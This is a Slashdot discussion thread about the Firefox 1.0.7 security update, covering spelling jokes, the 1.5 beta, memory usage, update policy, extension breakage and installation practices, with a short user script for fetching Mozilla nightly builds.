It's nothing to do with carelessness. Around the turn of the 17th century, there was a great U drought in the Americas. Printing presses were stopped all over the country as the sudden surge in popularity of what was known colloquially as the "News on Paper" led to a shortage of U's. It was soon followed by a similar lack of S. In an effort to stem the "Great S and U drought of '08", future President Jimmy Carter convinced W.C. Fields to talk John D. Rockefeller into a cunning plan. By replacing certain S's with Z's and removing vestigial U's, there were just enough letters to go around. This early exercise in letter economy led directly to modern internet parlance such as "OMG U R SO GAY!" and "ROTFLMFAOWGAHTYM!"

Isn't history wonderful?

Re:localised builds

[metamatic]

That would be localised then.

No it wouldn't; check the Oxford English Dictionary.

Re:localised builds

[cygnusx]

I use the en-GB builds mainly because Google Search defaults to google.co.uk (although I'm sure it can be changed in the en-US builds). It's a small thing but it's one less thing to configure.

Re:localised builds

[alasdair]

It's possible that it also replaces outlandish words like "cookies" with more familiar terms like "biscuits".

Thank-you, that's the funniest thing I've ever read on Slashdot.

Re:localised builds

You know what's embarassing? I'm a Canadian...and I used the American spelling of localised.

You hoser!

Re:localised builds

[Karamojong]

Well, not really. It's well known that the OED does not reflect common usage in this area. -ize is listed first even though most people writing British English use -ise these days. -ize is a valid variant (and is seen often in print, although it often strikes people as an Americanism) but has been in decline over the years at the expense of -ise. The OED is being conservative on this point. It's only to be expected that British and American orthography will diverge over time.

Re:localised builds

[aurelian]

I believe the OED has always favoured 'ized' in places where most other non-American authorities give 'ised'.

In this instance, the most common usage in Britain and Ireland would certainly be 'localised'. In fact the usage of 'ized' probably dropped during the last century in Britain and Ireland in a sort of rejection of the American spelling - the OED probably preserves an earlier more common British usage of the letter 'zed'. (or 'zee').. A lot of British speakers are now reluctant to use the letter anywhere other than at the start of a word, lest they be accused of Americanization.

I'd be happy to use 'z' more widely if, in return, Americans would agree to spell 'colour' correctly.

Re:localised builds

[squidsoup]

I'll second that.. excellent start to the day, thank you.

Re:localised builds

[Dave2+Wickham]

I'm not sure I want to try any of your cookies if they're like crumpets...

Re:localised builds

[SEE]

I'd be happy to use 'z' more widely if, in return, Americans would agree to spell 'colour' correctly.

We can't; we don't have the extra vowels. Unlike the British Empire, we didn't participate in imperialist vowel-looting of Balkan places like Krk and Vrbnik in the 19th Century.

Re:localised builds

[deanoaz]

>>> lest they be accused of Americanization.

Shouldn't that be 'Americanisation', since only we Americans use the evil 'z', and we never accuse anyone of it?

Re:localised builds

[pandrijeczko]

Can I also mention that no Englishman:

... would ever wear anything called a "fanny sack" in polite company

....would every have a problem stepping outside for a quick "fag"...

...would ever hold his "pants" up with a belt...

...would ever eat "grits" but spread them over his snow-covered driveway...

...would ever have a problem in borrowing a friend's "rubber" even though his friend might already have used it a few times...

...would ever pick up and take home a "bum" he found lying in the street...

1.5 Beta / Deer Park

[jgerry]

1.0.7? Neato, but I've been having fun playing with the 1.5 betas and 1.6 alphas. They have one great thing going for them -- they are FAST. Considerably faster than any previous release. I've tested Linux, Windows, OS X. Firefox team, you're getting there! Kudos.

Yeah, most extensions don't work. People are complaining about the new look of the menus (doesn't bother me). Definitely create a new profile and use it.

Re:1.5 Beta / Deer Park

[caulktel]

Yeah, well I downloaded 1.07 twice and install twice on my Mac Mini, crashes everytime you try to launch it. Must not of had any Mac's to test on.

Re:1.5 Beta / Deer Park

[bogaboga]

> but I've been having fun playing with the 1.5 betas and 1.6 alphas. They have one great thing going for them -- they are FAST. Considerably faster than any previous release. I've tested Linux, Windows, OS X. Firefox team, you're getting there! Kudos.

One thing is still lacking: - Beauty. Firefox on Linux is still ugly as compared to its windows counterpart. When will they do something about this?

Re:1.5 Beta / Deer Park

[amdotaku]

Yes, the one main problem I've always had with FF and the Mozilla suite before it was its horrid slowness. Especially on older hardware I usually find myself using something like links2 or konqueror(when in KDE) instead, unless they run into issues. 1.5b1 seems to have taken a step in improving this, but I still think it could get a bit better.

Re:1.5 Beta / Deer Park

[thebdj]

Ugly in linux? I will have to pay more attention when I get home but last I remember it looks practically the same on Linux (FC3) running laptop as it does on my Windows XP running desktop.

Re:1.5 Beta / Deer Park

[buraianto]

Ugly how? Are you referring to fonts, graphics, or the window and its decorations?

IE

[Brad1138]

If this had been an article about IE updates & security fixes, the majority of the previous posts would have been about how much M$ sucks.

Re:IE

[Silkejr]

That's because ms sucks. Get a clue.

Re:IE

[databyss]

Fear not!

There will be plenty of posts saying how much FireFox sucks.

Re:IE

[kkek]

That's because ms sucks. Get a clue.

Microsoft actually is very capable of putting out a really nice product. They just dont have any reason to spend the extra time/money most of the time, because customers will still use/buy a lower quality product. Take Microsoft Office for example. On Windows, office crashes (somewhat frequently... not as often as older versions, but enough to be noticable).

Now look at Microsoft Office for Mac OS X. I have never experianced a crash, it works flawlessly with the windows version (minus encrypted file support), and looks a lot better. Thats because the average Mac user have gotten used to, and expect a better product than the average windows user. (No offense to windows users intended... I still use windows on one of my computers, I have just noticed that I get higher quality apps on my mac than PC)

When the pressure's on, Microsoft can put out a very good product.

Re:My message...

For those of you who are going to start bitching about Firefox's alleged insecurity ("OMG! Firefox isn't as secure as everyone thought, so many vulnerabilities are being reported!"), here's 3 words for you:

No one cares.

Typical Slashdot mentality: Ignore issues with open source while building a mountiain out of a mole hill over Microsoft issues.

Clue for you: Failure to acknowledge problems does not make them disappear.

One Fast Download!

[SmartyFartBlast]

wow, amazing what speeds I saw on that, over 1mbit which is pretty nice. Sure its not a super large file, but nice to see good speed when the server hasnt been /.'d

Now I wonder if my extensions will crash or act buggy...ah, well....the price was right ;-)

Re:My message...

[Professor_UNIX]

No one cares.

How wrong you are. The people that care are the ones who were constantly barraged with Mozilla fanboys telling them how much IE sucked and how much more secure Mozilla was. Now that the vulnerabilities are popping up in Firefox like hotcakes the fanboys look like fools. /Firefox fanboy

something concerns me

[Dink+Paisy]

"In addition, some regressions introduced by previous 1.0.x security updates have been resolved."

Too many regressions caused by security updates, and people will turn off auto-update. That's the very reason that Microsoft moved to a monthly update cycle. Getting updates out quickly is important, but unless the security hole is being actively exploited, it's probably more important to make sure nothing else gets broken by the fix. If you convince people not to install updates, then you're in really big trouble.

Re:something concerns me

[amdotaku]

Indeed, this is the dark side to Firefox, its stand alone update cycle. Its not friendly to extension developers, confuses and annoys users and administrators, and worse of all makes the whole Distribution based system the rest of FOSS uses go to pot.(Some people just want to run a version that comes with the distro without constant worrying and compatibility issues.) I think Firefox's special position at the head of the FOSS movement has made them focused too much on runing their own tight ship and not enough about letting their users do the same.

Re:something concerns me

[theodicey]

Microsoft, which finds most of its security bugs in house, doesn't have to worry about disclosure.

Too many of Mozilla's recent bug fix releases have had to be rushed out the door, because the person who identified the bugs (in Mozilla's open source code) has published on some full disclosure website.

If you look at Bugzilla, it's obvious that mozilla doesn't let security bugs fester. The "full disclosure" wankers should be publicly recognized as the public nuisances they are.

Re:something concerns me

Full disclosure is a good thing if its done responsibly. An example of irresponsible full disclosure was seen recently when some bozo submitted a security bug, and when he hadn't heard from someone 2 *days* later, did the public announcement because he claimed the developers were ignoring the problem. The Moz/FF crew had a fix ready 1 day after that.

Re:something concerns me

[halr9000]

makes the whole Distribution based system the rest of FOSS uses go to pot

I say they should do what works. Automatic updates work. Should they slow down the cycle or introduce new communication, including time bulit-in for extension developers, yes. But to make the advancement of your software dependent on 50 different distributions is silly.

Some people just want to run a version that comes with the distro without constant worrying and compatibility issues

Well "some users" will run Windows 95, too. That's not the best argument...

focused too much on runing (sic) their own tight ship and not enough about letting their users do the same.

Well they should concentrate on running their own tight ship! Nobody else is going to do it for them. The users who do not like this can disable updates.

Re:something concerns me

[Will_TA]

The problem I have with the infrequent builds, is getting them distributed. Since I admin a school network, I have to lockdown firefox so no one can tamper with proxy settings, or install the latest 3l33t extension, package it to an MSI and then distribute via group polices! I'm sure I must be missing an easier route...

Re:something concerns me

[Shook18]

Luckily, the beta version solves the standalone update cycle. It uses smaller updates instead of reinstalling the whole program. Much more efficient.

Re:something concerns me

[jZnat]

Well, it's not that hard to get some sort of auto-update script going if you can't get the internal binary patching system to work (for me, however, it works orgasmically):

#!/bin/bash
cd ~
wget ftp://ftp.mozilla.org/pub/mozilla.org/firefox/\
n ightly/latest-trunk/\
firefox-1.6a1.en-US.linux-i 686.tar.bz2
tar -xjf firefox-1.6a1.en-US.linux-i686.tar.bz2
sudo mv ./firefox /usr/local/firefox

Really now, not that difficult to to once a day (cron it up). Then again, I'm not too advanced with shell scripting, so I'm sure you could shorten that and undoubtedly be able to use /bin/sh instead, but I love bash, so nyah.

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20050920 Firefox/1.6a1 ID:2005092017

Re:something concerns me

[amdotaku]

That wasn't my point. My point was that shoving random updates at users in a way thats totally different than everyone else in FOSS is not good, among other things. The actual functional ease isn't the issue at all.

Re:something concerns me

[jZnat]

I see your point, but it seems that every day that I run apt-get update, there are at least a few packages that need to be updated, and I don't have assloads like some people (1113 at the moment, many of which are developmental packages and libraries). This issue is not Mozilla-centric.

Re:something concerns me

[ArmorFiend]

I think Firefox's special position at the head of the FOSS movement has made them focused too much on runing their own tight ship and not enough about letting their users do the same.

There's a case for firefox exceptionalism. Firefox bugs aren't the same as bugs in gnuplot or clisp. The latter are great systems, true, but they're not out there on the front lines of the end-user experience, serving as the thin orange line between almost every FOSS users' private information and crackers.

Great!

[setzman]

Now will it stop using anywheres from 73,788 K to 253,000 K RAM? I thought Firefox was supposed to be small and efficient, but that's the ram usage reported by Task Manager.

Re:Great!

[flyboy81]

That would be great, or at least give us a hint how to use it so it will free up some of it's memory (other than restarting), or to point out features we're using that do use this much memory.

I'm usually around 750,000k but have seen it go over 1 Gb.

Re:Great!

Mine is using 9.5 megs of RAM in my task manager...

Re:Great!

[jimmy_dean]

Web pages take a lot of room in memory to store. This is due to web pages being full of images and other large binary data. This is just a fact of life and is not really anything unique to FireFox.

Re:Great!

[Junior+J.+Junior+III]

How many extensions are you running?

How many tabs do you have open?

Re:Great!

Here here, I agree. FF is a memory hog. I contstantly have to shut it down and restart or it continues to eat up my RAM until it's way too sluggish.

Re:Great!

This is just a fact of life and is not really anything unique to FireFox.

Except for the fact that Opera uses far, far less RAM than Firefox does, of course. Even IE uses less, but then, it also accomplishes less, so this is probably to be expected.

Re:Great!

[Malc]

1) Web pages don't take tens or hundreds of MB
2) Other browsers such as IE don't have this problem

Do any of the devs run tools like BoundsChecker over their code?

Re:Great!

Sure. Just cut down on the amount of porn you have open at any given point in time. Do you reall need 250 highres images open at once?

Re:Great!

[keithoc]

I got this all the time too - apparently this isn't a Firefox problem but instead a memory leak in the Flash plugin.

See here for workaround: http://fusion94.org/archives/2005/07/firefox_memor y.html

Re:Great!

[xutopia]

use flashblock. Did it for me. Those nasty flash animations were screwing with the memory.

Re:Great!

[The+Bungi]

Yay, Microsoft and Opera must have invented a really kewl propietary compression scheme because, well, IE and Opera 8 both use about 1/10th the memory Firefox does.

Apologetic fanboy.

Re:Great!

[pinkocommie]

I implemented the workaround a while ago (set it to 4 megs instead of the 60 suggested). i have a single window open with about 20 tabs and my memory usage is 416 megs. Any other ideas? (seriously love firefox but the resource intensiveness is more then mildly annoying)

Re:Great!

I haven't tried it but I know 4 mb is way too low. It could be completely ignoring it.

Re:Great!

Indeed, they use LZip.

Re:Great!

[pyrrhonist]

Web pages don't take tens or hundreds of MB

The raw size of this discussion is ~130K. When this discussion is rendered in IE it is ~10M. That's the difference.

Other browsers such as IE don't have this problem

I just did a comparision of IE and Firefox with regard to memory usage. I restarted both of them fresh and did some browsing to the same web sites in a single window. After several minutes, the memory usage, peak memory usage, and VM size are the same for both browsers (~30M, ~30M, and ~20M respectively).

I think the problem people are having with memory usage is that they are comparing a tabbed firefox with a single IE window. Try using a single window in Firefox or opening as many windows in IE as you have tabs in Firefox. Also don't try comparing a fresh browser to another browser that has been running for a while (of course the one that has been running a while will use more memory).

I've never had an issue with memory usage in either browser. If your browser is taking up hundreds of MB while only reading slashdot, your system is hosed.

Re:Great!

[ergo98]

I got this all the time too - apparently this isn't a Firefox problem but instead a memory leak in the Flash plugin.

I read the blog and it doesn't seem convincing - there is a bit of a comment about Flash being the culprit, but then he/she segues to limiting the use of memory for caching.

Of course countless expanding memory caches have been misidentified as "leaks" over the years - SQL Server, for instance, will gobble up all available memory to use as a data cache, but it does it slowly as it pulls in data (just like Firefox does as you browses the web), utilizing memory as a much faster way of accessing data. As such there have been endless claims of SQL Server's "memory leak", and how people "solved" it by setting the governor limiting how much memory SQL Server will consume (all so they can sit and admire the high amount of unutilized available memory on their boxen). It should be noted that SQL Server relinquishes memory as other applications start asking for it (dunno if Firefox does the same).

I suspect the Firefox "fix" is much the same.

Re:Great!

[Malc]

Why not compare it with a browser that's been running for a while? My browser runs for days on end. In this situation, the memory leaks become critical as they really add up. I believe there are some serious memory leaks in Firefox, as I've seen it sitting at 250MB with only one tab open.

Re:Great!

[M1000]

No this is not a "fact" of life. The problem here is that when the page is GONE, the memory is not released. If I open a big graphic file, and then close the tab, I expect to see the memory released, not LOST.

My god, this post is as useless as your comment...

Re:Great!

[pyrrhonist]

Why not compare it with a browser that's been running for a while?

Because comparing a browser that was just started with one that has been running for a while isn't a fair test. Either compare two that have been running the same amount of time, or two that were freshly started, but don't mix and match. :)

I believe there are some serious memory leaks in Firefox, as I've seen it sitting at 250MB with only one tab open.

Then your machine is hosed somehow. I've run Firefox for weeks with no memory issues, and Firefox doesn't have issues freeing memory for me.

Also, the machine I did the test on from earlier has *dropped* down to 24M with a peak of ~35M and four tabs open.

I'm not saying that you're wrong, but I'm simply not seeing *any* memory leak, and in fact, I am seeing the opposite.

Re:Great!

[pinkocommie]

Upped it to 60 megs as per the tip still going on 260 megabytes consumed

Re:Great!

[NutscrapeSucks]

There's been many many reports of enormous memory usage with Firefox, even with all windows and tabs closed. It's great you are immune, but that doesn't mean the other guy's system is hosed.

Re:Great!

[Hugonz]

Fuck, still? NS4.7 worked just fine unless you loaded that fucking crap of a plugin. Is there a petition or something we can sign

Re:Great!

[pyrrhonist]

There's been many many reports of enormous memory usage with Firefox, even with all windows and tabs closed. It's great you are immune, but that doesn't mean the other guy's system is hosed.

Uh, don't take what I said too literally. I didn't mean to imply that he needs a new system and a shaman to exorcise the Bad Things. I was just reiterating. Sorry if it came across otherwise.

Middle-click on OSX?

[xjerky]

Will middle-clicking to oplen a link in a new tab
ever show up in an official release for OSX? It's really retarded that I must rely on nightly betas in order to use this simple feature, in which case I can't use most of the plugins that made Firefox attractive to me in the first place. Very frustrating.

Re:Middle-click on OSX?

[someonehasmyname]

Since it was broken in the original 1.0 release for OS X, they're not fixing it until the next major release.

If you play with the 1.5 beta, it's fixed, just like in the nightlies, and none of your plugins will work, just like the nightlies.

I'm still using Safari because of stupid stuff like this...

Re:Middle-click on OSX?

Command-click.

Hold the command key as you click.

A new tab is created.

Re:Middle-click on OSX?

[dfunct]

I find the middle click working just fine on both my Macs ... one running a G5 optimized build and the other running deer park alpha 2

Re:Middle-click on OSX?

[xjerky]

Yes - but how many of Firefox's popular themes and plugins are actually working for you?

Re:Middle-click on OSX?

[xjerky]

Great - but that requires the use of 2 hands, whereas Firefox users on every other platform only needs one.

(no masturbation jokes please)

Re:Middle-click on OSX?

[dfunct]

Too be honest I have no idea then again I only use user agent swticher, tabbrowser prefences and BugMeNot and they all seem to work for me ... the optimized build is of firefox 1.0+ (or so it tells me)

Re:Middle-click on OSX?

[hyperizer]

Just configure your third-party mouse driver (or a generic one like USB Overdrive) to make middle-click send command-click when you're in Firefox.

Re:Middle-click on OSX?

[cortana]

You can probably override Firefox's platform-specific setting for what to do on a middle-click by setting some things in about:config.

Re:Middle-click on OSX?

[milkman_matt]

If you play with the 1.5 beta, it's fixed, just like in the nightlies, and none of your plugins will work, just like the nightlies.

It just took a week or two for the people managing the extensions to catch up and make them work in the new release.. That's to be expected.. In any case I use about 10 extensions (mostly tab related) and all but TabX and Google Toolbar have been updated (even mouse gestures, which took the longest) now works. I've now ditched Safari entirely.

1.0.7 or..

[Turn-X+Alphonse]

1.0.7 or Beta 1..?

I guess 1.0.7 has more security fixs but beta has some nice new features... which to use?

Re:1.0.7 or..

[CastrTroy]

I really wish I could run both versions, using different directories to store the settings.

Re:1.0.7 or..

1.0.7 has exactly one more security fix than deer park 1.5 beta 1, or the same number as SeaMonkey 1.0 alpha. And that one isn't anything I'd call critical.

Re:1.0.7 or..

[Maian]

Get a nightly version.

Re:1.0.7 or..

[Rogue+Pat]

Of course you can. Suppose you're on windows. Run your firefox.exe from the command line with argument -p. The profile manager comes up, which allows you to manage you profiles. Create a new one, and assign it a directory. If you want you can for instance use copy your existing bookmarks and user.js from one profile to the other to jump start the new profile a bit better. You can then execute firefox 1.0.7 by running that executable with the argument "-p whateveryourprofilenameONEis" and Deer Park by running that executable with argument "-p whateveryourprofilenameTWOis" Make appropriate shortcuts for easy access.

Re:1.0.7 or..

[CastrTroy]

Thanks for the great tip. This is good for developers who want to be able to check against different browser versions. Now, the real trick is, How do I install multiple versions of IE?

Re:1.0.7?

keep using it and keep eating every banner you find

broke extensions

[bdigit]

and now after the upgrade none of my extensions work. They are there but none of them are active.

Bad Ads

[Dalroth]

I've had a problem with Firefox lately (starting around build 1.04, which may just be coincidental with a new malevolent popup technique being invented) on both my Windows and OSX boxes. Specifically, there are certain ads that cause Firefox to crash hard, and they aren't just bad ads from porn sites. I've occasionally gotten them on Blues News and NY Times for example.

In some cases, I'm lucky to get an exception and can restart Firefox. However, in most cases, the application freezes. On OSX, I get the swirling beach ball of death and have to manually force quit Firefox. On windows, I can usually close Firefox, but only the main window closes. I still have to manually kill the process before I can start a new instance.

Since then, I've moved on to 1.5 alpha and it while I don't believe I am currently experiencing those problems, 1.5 alpha has a whole new set of problems all its own.

My question is... have these ad related crashes been fixed (or am I the only experiencing them)? I'd like us to the most stable version possible, but when 1.5 alpha is better than the 1.0x builds, I'm left wondering what went wrong...

If this isn't resolved soon, I just might have to give AdBlock another shot. I'm trying to be a good netizen, but when you're ads kill my browser, you leave me with little choice!

Bryan

Re:Bad Ads

[akulbe]

I'm using 1.0.7 on OS X, and as I commented previous, I think the issues I had are fixed. (at least from what I can tell so far) I had the same issues as you describe. All my attempts to reproduce the swirling beach ball of death are unsuccessful, thankfully.

Re:Bad Ads

[Malc]

Have you tried running with a new profile and/or disabling any extensions that you might have installed? I can't say I've seen any of these crashes that you've experienced.

Re:Bad Ads

[Zathrus]

Specifically, there are certain ads that cause Firefox to crash hard

Are you running Flashblock? Make sure you have the latest revision if so -- there are some known problems w/ Firefox 1.0.x, Flashblock, and some Flash ads. The Flashblock devs have tried to work around them, but it's a problem in Firefox itself. I never experienced them on Blue's (yes, I'm the same guy from there), but I experienced them fairly often on Tech Report until I went to 1.5B1.

And yes, 1.5B1 fixes the issue. It's been fixed in trunk for awhile.

I've experienced another insta-crash (not even a "this program has done something bad!" from Windows) on rare sites w/ 1.0.x, but I've never been able to figure out what it was due to or cause it to occur repeatably.

Re:Bad Ads

[Dalroth]

Yes, I was using Flashblock with the 1.0x builds (not sure if it's been ported to the 1.5 builds). I suspected that might have been one possible source of the problem, however, grokking through Bugzilla isn't that easy.

If I can find a site that consistently causes Firefox to crash, I'll try it w/o Flashblock. That being said, Flashblock is one of the single greatest ideas in the history of ALL computerdom, so I'd be hard pressed to permanently disable it. ;)

I can deal with text ads. I can deal with gif ads. DHTML, Popup, and Flash ads? No thanks!

Bryan

Re:Bad Ads

[Zathrus]

not sure if it's been ported to the 1.5 builds

It has been, you can get it from flashblock.mozdev.org -- as with a lot of 1.5B1 compatible extensions, it's not on the main extension site yet.

Convieniently, that also has the info on the 1.0.x problems, including the Bugzilla reference (which, I agree, is pretty much impossible to find otherwise).

And I agree with you on Flashblock and ads.

Re:Bad Ads

[jrumney]

I had problems a while ago with Firefox crashing on some ad filled sites which turned out to be caused by the version of FlashBlock I'd installed from the main Extension's page. To get the latest version, you have to go to the FlashBlock homepage, follow the uninstall instructions and install the newer version from there. I don't know why the old version continues to be distributed from the main Extensions page, probably to prevent automatic updates that would bypass the painful uninstall process you have to go through.

post #98549854 in a series

"Why these Firefox vulnerabilities are irrelevant and why IE vulnerabilities will be the death of us all"

Straight to Mozilla's FTP

[Pao|o]

Linux

http://ftp.mozilla.org/pub/mozilla.org/firefox/rel eases/1.0.7/linux-i686/en-US/

Mac OS X

http://ftp.mozilla.org/pub/mozilla.org/firefox/rel eases/1.0.7/mac/en-US/

Windows

http://ftp.mozilla.org/pub/mozilla.org/firefox/rel eases/1.0.7/win32/en-US/

Re:Straight to Mozilla's FTP

whore. The site wasn't even slashdotted.

Branches and trunks

If Mozilla Firefox 1.0.7 was just released... Then what was Mozilla Firefox 1.5 Beta 1?

It was a release of the 1.5 branch (which could be the trunk?) of FF. 1.0.7 is a release from the 1.0 branch of FF. On any large software project, it is common to "branch" (make a snapshot) of the source tree when you are planning on doing a release. This allows you to isolate code changes (typically you only want bug fixes going into a release candidate branch while new functionality is allowed to continue in the main trunk). Like I said, this prevents potentially de-stabilizing new features from getting into your releases.

This does present a bit of a hassle though, as often times you will have to fix bugs in the branches as well as the trunk, so it creates more work in that regard. But on large projects with lots of developers, this really is the only workable solution.

Re:And yet.....

[gordgekko]

As usual means you wait up to two weeks before an arrow shows up or if you decide to manually check for updates under Tools>Options>Advanced>Software Updates.

I like Firefox but being forced to wait days -- or longer -- for a security update is utterly pathetic. If I wanted a browser with known exploits that I can't patch I'd use IE.

Wasteful code forking

If the Mozilla community is moving towards modular design, shouldn't it be building SeaMonkey suite based on Firefox/Thunderbird/Sunbird components (and modularizing Chatzilla, DOM inspector, and other Mozilla suite components), instead of wasting time to maintain Mozilla 1.7 code base? With efficiency like this, no wonder why the browsers projects keep having delays.

Sex sells

I am working to spread the firefox browser.

We all know that sex sells.

So try to look at this site http://www.thelovesearch.com/
using Microsoft Internet Explore.

It will try to convince your to use Firefox using sex appeal.

If we could convince all porn sites to only support Firefox the battle
would be won in a few weeks.

Or am I dreaming now ??

Re:Sex sells

Considering most porn sites are full of pop-ups and ads, I don't think thisidea would fly.

Firefox would block most, if not allof them.

Re:Sex sells

[Isomorph]

Year your are dreaming, but the girls are cute.

Re:Sex sells

[Pneuma+ROCKS]

but the girls are cute.

Dude, I hope you're not refering to all of them. How long have you been using Slashdot?

How's the performance?

[RatBastard]

Is it any faster? Will it stop bringing my Dual G5 Powermac to its knees? Is it any less of a memory pig?

Re:How's the performance?

Runs great under Linux on my Pentium 3 450. Perhaps it isn't firefox but your choice of operating system.

The M$ Take

[IorDMUX]

Ah. Mozilla has lept upon more discovered holes and promptly fixed them.

And somehow, these fixes make the browser all the less secure in the eyes of the big guys.

Re:And yet.....

[op12]

If I wanted a browser with known exploits that I can't patch I'd use IE.

True, two weeks is pretty long. Honestly, I don't know exactly how long before an update will appear, because as long as it appears in a reasonable amount of time I'm fine with it. You have the option to get the update faster. As far as I know, the purpose of the staggered update schedule is to reduce bandwidth strain, so not everyone is downloading the update at the same time. I don't see a major problem with that, especially since you have another option (download directly from their site).

FFS

[kmmatthews]

Everytime there's a new Firefox release, legions of people incapable of reading other comments complain about this. The browser updates come a day or two after the official release. If you're impatient, download it manually.

Re:And yet.....

[nacturation]

I like Firefox but being forced to wait days -- or longer -- for a security update is utterly pathetic. If I wanted a browser with known exploits that I can't patch I'd use IE.

You're not forced to wait days. Just download the source, find the bugs, and fix them yourself. After all, isn't the lack of source code what you meant by IE being "a browser... that I can't patch"? It's not like Microsoft doesn't release updates for IE or anything.

Re:And yet.....

[gordgekko]

And that's a great option...if I know there is a new version of Firefox. I may know because I frequent /. but Joe, Jane and Aunt Millie may be left unprotected for weeks because they don't keep up with security bulletins or this web site because they have lives.

That's simply unacceptable. Whether the reason is good or bad, and I'm understanding of the bandwidth issue and the costs associated, we're leaving potentially millions of machines open to exploit. Hardly a claim to a more secure future.

I can't wait until 1.5 goes live and we can ditch this stupid unmodular system that we've been 'graced' with.

750MB?

[YesIAmAScript]

So you're saying that Firefox is string 750MB of data it got off the web?

Well, let's see, my DSL is quite fast, it is 6mbits/second actually (lucky me). That means that Firefox is storing the equivalent of 1,000 seconds or about 20 minutes of continuous downloading. For other people it could be easily double that.

Why doesn't that seem entirely correct to me? I'd know if I sat through 20 minutes total downloading.

BTW, IE doesn't soak up as much RAM, and it's pretty damn fast.

Firefox probably needs to look at more memory-efficient caching.

Re:750MB?

[flyboy81]

I'm probably hitting this flash memory leak bug someone else made a note of here. I'm taking a look at now.

This is my browser at work and I usually have so many tabs that I get that marvelous clipping effect at the right side of the tab bar. And after a week or so I'm usually up to 750mb.

It doesn't really affect me as I have 2Gb of RAM in my workstation, I usually restart Firefox after some crappy flash ad locks up the browser.

Firefox annoyances

[Henry+V+.009]

• Trying to install from a Limited Account in Windows brings up a dialog "highly recommended that you install as Administrator."
• There is no longer a way to disable the Quality Feedback Agent under custom install.
• Firefox Update is small and non-obvious. Windows really lets me know when there is a patch for IE out. I can trust IE to keep itself patched on Grandma's system -- but not Firefox.

Re:Firefox annoyances

There is no longer a way to disable the Quality Feedback Agent under custom install.

Uninstall the old version first, or install to a new directory. An upgrade will upgrade all the components that are installed (plus give you the option to install new ones).
That said - yes, the firefox installer sucks donkey balls.

Firefox Update is small and non-obvious. Windows really lets me know when there is a patch for IE out. I can trust IE to keep itself patched on Grandma's system -- but not Firefox.

This has been an area that has received a lot of attention, and you should have no complaints about it anymore come 1.5

Re:Firefox annoyances

[Penguin+Programmer]

Trying to install from a Limited Account in Windows brings up a dialog "highly recommended that you install as Administrator."

There are two cases I'm considering here:
Case 1: You think that it should let you install without warning you if you try to install it as a regular user.
Case 2: You think that it shouldn't let you install at all as a regular user, since that's what the admin account is actually for.

In case 1, you are an idiot. One of the biggest security problems in Windows is that any regular old user can install software system-wide.
In case 2, I agree whole-heartedly.

In either case, it's just one more reason you shouldn't use Windows. There's no such popup in Linux.

Re:Firefox annoyances

[Henry+V+.009]

Hmm, you installed Firefox as root on your home Linux computer? Install a lot of software as root, do you?

Unless?

[Spy+der+Mann]

but unless the security hole is being actively exploited, it's probably more important to make sure nothing else gets broken by the fix.

Enter the paradox: If the fix isn't released until a month, the security hole CAN and WILL be actively exploited.

In other words, is it worth to replace a critical bug (security) with a minor bug (annoyance)?

Re:Unless?

In other words, is it worth to replace a critical bug (security) with a minor bug (annoyance)?
 
If you value security over convenience, yes. Unfortunately, most people don't.

Re:Unless?

[gcauthon]

In other words, is it worth to replace a critical bug (security) with a minor bug (annoyance)?

How do you know it will always work out that way? What if an update replaced a critical bug with an even more critical bug? It's not as if developers are conscientously replacing one bug with another. The latter bug will probably be a surprise.

Re:Unless?

[syousef]

In other words, is it worth to replace a critical bug (security) with a minor bug (annoyance)?

That depends on if the annoyance is so minor. A system that doesn't work isn't much good to anyone. A system that's compromised and leaks your data (and therefore possibly all your money) is worse. It's usually worth doing some amount of testing rather than rushing something out the door. If it's that big a security hole the system should be brought down until it can be fixed PROPERLY.

Opera

[dancpsu]

I would update, but I already switched to Opera when they made it free.

Re:Opera

[istrebitjel]

Me, too... I guess I'll not get Funny points for that ;)

I just got a fresh hdd and had to reinstall Firefox. And when I was just installing all the extensions I need and half of them didn't yet work with the new version along came the news about Opera being free now and my decision to stick with Opera for a while.

I was a registered Opera user before Firefox came and I never regretted that money (even now Opera is free). For some reasons I had switched to Firefox and kept adding extensions so it would behave like Opera...

Re:And yet.....

[op12]

I can't wait until 1.5 goes live and we can ditch this stupid unmodular system that we've been 'graced' with.

I couldn't agree more. Hopefully that will also bring about improvements on the speed of updates getting out to people.

Don't use your distro tools to install it...

[MsGeek]

Then do what I do: don't use your distro's tools to install Firefox, use their Linux installer and install to a subdir in your user directory.

I had my Firefox 1.0.6. installed in a directory under /home/mydir called firefox106. Last time I installed as root there so I had to remove the directory as root.

Then, as me, I set up a directory called Firefox107. I made a directory under that one called Firefox as the installation area for the install of Firefox 1.0.7. I then downloaded the Linux installer for 1.0.7 directly from mozilla.org. I untarred/gunzipped the installer into the Firefox107 directory. It made a firefox-installer directory under Firefox107 where I then clicked the firefox-installer script to start the install process. Again, I installed as me, not as root. The install was as easy as anything packaged by Vise or InstallShield. I pointed the installer to the Firefox directory. Badabingbadabangbadaboom!

Now I have a version of Firefox that runs as me instead of running as root, which I'm sure is a lot more secure than the way I had it last time. Next time there is an update, I can just do the same thing. Create a new directory for the new version to live, download the installer from mozilla.org, delete the old one, run the installer. Easy.

Re:Don't use your distro tools to install it...

[prgrmr]

Now I have a version of Firefox that runs as me instead of running as root, which I'm sure is a lot more secure than the way I had it last time.

Very most likely, but would also depend on if you've added any other groups to your login ID, particularly adm or sys.

Re:Don't use your distro tools to install it...

[MikeFM]

That's not such a good idea in general. Installs from the distro are tested and signed (pretty sure not to be infected with viruses) whereas Firefox's update system assumes behavior of crappy OS like Windows that doesn't auto-update all programs as needed. Auto-update is a good idea but they should strive to work with existing update infrastructures when those exist. There is to much conflict between apt/yum/rug/whatever and Firefox's own update system and it does cause bugs and odd behavior sometimes. That doesn't make it a good idea to abandon the update infrastructure provided by your distro. :)

On the other hand I think distros need to recognize the need of users to install software at the user-level and make their packages and package mgmt system work better for that. As it is they tend to make it difficult to install packages just for a single user.

Re:Don't use your distro tools to install it...

[RidiculousPie]

Now I have a version of Firefox that runs as me instead of running as root

Firefox launched as your user runs as your user regardless of where it is installed, unless installed suid root or you are in the sys or adm groups (off the top of my head), or launched using sudo, gnomesu or similar.

Re:Don't use your distro tools to install it...

[cloudmaster]

It doesn't matter what groups you are in (or who owns the directory). Barring things like a suid firefox (which is a sign that someone needs to learn more about how *nix works) and sudo (which is a sign that someone might need to learn more about how *nix works), it runs as the user who launched it.

Re:Don't use your distro tools to install it...

[passthecrackpipe]

Heh, a list of many complex actions involving different user ID's, directories and other computer "magic" as seen from a users perspective, followed by:

